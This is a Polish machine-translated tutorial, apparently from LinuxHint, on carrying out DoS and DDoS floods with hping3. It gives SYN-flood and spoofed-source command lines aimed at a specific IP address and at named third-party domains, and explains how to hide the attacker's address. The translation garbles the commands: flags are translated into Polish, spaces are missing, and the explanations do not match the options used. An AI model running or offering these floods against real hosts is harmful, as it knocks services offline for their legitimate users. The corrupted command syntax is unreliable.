hping3 powódź ddos

Hping3 Flood Ddos



Ten samouczek koncentruje się na atakach DDOS (Distributed Denial of Service) przy użyciu narzędzia hping3. Jeśli jesteś już zaznajomiony z atakami DOS (Denial of Service) i DDOS, możesz kontynuować czytanie praktycznych instrukcji hping3, w przeciwnym razie zalecane jest zapoznanie się z działaniem tych ataków.

Ataki DOS


Atak typu „odmowa usługi” (DOS) to bardzo prosta technika odmowy dostępu do usług (dlatego nazywa się to atakiem typu „odmowa usługi”). Atak ten polega na przeładowaniu celu zbyt dużymi pakietami lub dużą ich ilością.







Chociaż ten atak jest bardzo łatwy do wykonania, nie zagraża informacjom ani prywatności celu, nie jest atakiem penetrującym i ma jedynie na celu uniemożliwienie dostępu do celu.
Wysyłając pewną liczbę pakietów, cel nie może obsłużyć atakujących, uniemożliwiając serwerowi obsługę legalnych użytkowników.



Ataki DOS przeprowadzane są z jednego urządzenia, dlatego łatwo jest je powstrzymać blokując adres IP atakującego, jednak atakujący może zmienić, a nawet sfałszować (sklonować) docelowy adres IP, ale firewallom nie jest trudno poradzić sobie z takimi atakami , w przeciwieństwie do ataków DDOS.



Ataki DDOS

Atak typu Distributed Denial of Service (DDOS) jest podobny do ataku DOS, ale jest przeprowadzany jednocześnie z różnych węzłów (lub różnych atakujących). Zazwyczaj ataki DDOS są przeprowadzane przez botnety. Botnety to zautomatyzowane skrypty lub programy, które infekują komputery w celu wykonania zautomatyzowanego zadania (w tym przypadku ataku DDOS). Haker może stworzyć botnet i zainfekować wiele komputerów, z których botnety będą przeprowadzać ataki DOS, fakt, że wiele botnetów strzela jednocześnie, zamienia atak DOS w atak DDOS (dlatego nazywa się to atakiem rozproszonym).





Oczywiście są wyjątki, w których ataki DDOS były przeprowadzane przez prawdziwych ludzi atakujących, na przykład grupa hakerów Anonymous zintegrowana przez tysiące ludzi na całym świecie bardzo często używała tej techniki ze względu na jej łatwą implementację (wymagało to jedynie ochotników, którzy podzielili się ich sprawą), tak na przykład Anonim pozostawił libijski rząd Kaddafiego całkowicie odłączony podczas inwazji, a państwo libijskie zostało bezbronne wobec tysięcy napastników z całego świata.

Ten rodzaj ataków, przeprowadzanych z wielu różnych węzłów, jest niezwykle trudny do zapobieżenia i zatrzymania oraz zwykle wymaga specjalnego sprzętu do radzenia sobie z nimi, ponieważ zapory i aplikacje obronne nie są przygotowane do radzenia sobie z tysiącami napastników jednocześnie. Nie dotyczy to hping3, większość ataków przeprowadzanych za pomocą tego narzędzia będzie blokowana przez urządzenia lub oprogramowanie obronne, ale jest to przydatne w sieciach lokalnych lub przeciwko słabo chronionym celom.



O hping3

Narzędzie hping3 umożliwia wysyłanie zmanipulowanych pakietów. To narzędzie pozwala kontrolować rozmiar, ilość i fragmentację pakietów w celu przeciążenia celu i ominięcia lub ataku zapory. Hping3 może być przydatny do celów testowania bezpieczeństwa lub możliwości, używając go można przetestować skuteczność zapory i czy serwer może obsłużyć dużą liczbę pakietów. Poniżej znajdziesz instrukcje, jak używać hping3 do celów testowania bezpieczeństwa.

Pierwsze kroki z atakami DDOS przy użyciu hping3:

W Debianie i opartych na nim dystrybucjach Linuksa możesz zainstalować hping3, uruchamiając:

#trafnyzainstalowaćhping3-oraz

Prosty atak DOS (nie DDOS) byłby następujący:

#sudohping3-S --powódź -V -P 80170.155.9.185

Gdzie:
sudo: daje potrzebne uprawnienia do uruchomienia hping3.
hping3:
wywołuje program hping3.
-S: określa pakiety SYN.
-powódź: strzelaj według uznania, odpowiedzi zostaną zignorowane (dlatego odpowiedzi nie będą wyświetlane), a pakiety zostaną wysłane tak szybko, jak to możliwe.
-V: Gadatliwość.
-s 80: port 80, możesz zastąpić ten numer usługą, którą chcesz zaatakować.
170.155.9.185: docelowy adres IP.

Flood przy użyciu pakietów SYN na porcie 80:

Poniższy przykład przedstawia atak SYN na lacampora.org:

#sudohping3 lacampora.org-Q -n -D 120 -S -P 80 --powódź --rand-źródło

Gdzie:
Lacampora.org: jest celem
-Q: krótkie wyjście
-n: pokaż docelowy adres IP zamiast hosta.
-d 120: ustaw rozmiar pakietu
–rand-źródło: ukryj adres IP.

Poniższy przykład pokazuje inny możliwy przykład zalania:

SYN flood na porcie 80:

#sudohping3--rand-źródłoivan.com-S -Q -P 80 --powódź

Dzięki hping3 możesz również atakować swoje cele fałszywym adresem IP, aby ominąć zaporę ogniową możesz nawet sklonować swój docelowy adres IP lub dowolny dozwolony adres, który możesz znać (możesz to osiągnąć na przykład za pomocą Nmapa lub ustanowionego sniffera do słuchania znajomości).

Składnia byłaby następująca:

#sudohping3-do <FAŁSZYWY IP> <cel> -S -Q -P 80 --szybciej -c2

W tym praktycznym przykładzie atak wyglądałby:

#sudohping3-do190.0.175.100 190.0.175.100-S -Q -P 80 --szybciej -c2

Mam nadzieję, że ten samouczek dotyczący hping3 okazał się przydatny. Śledź LinuxHint, aby uzyskać więcej wskazówek i aktualizacji dotyczących systemu Linux i sieci.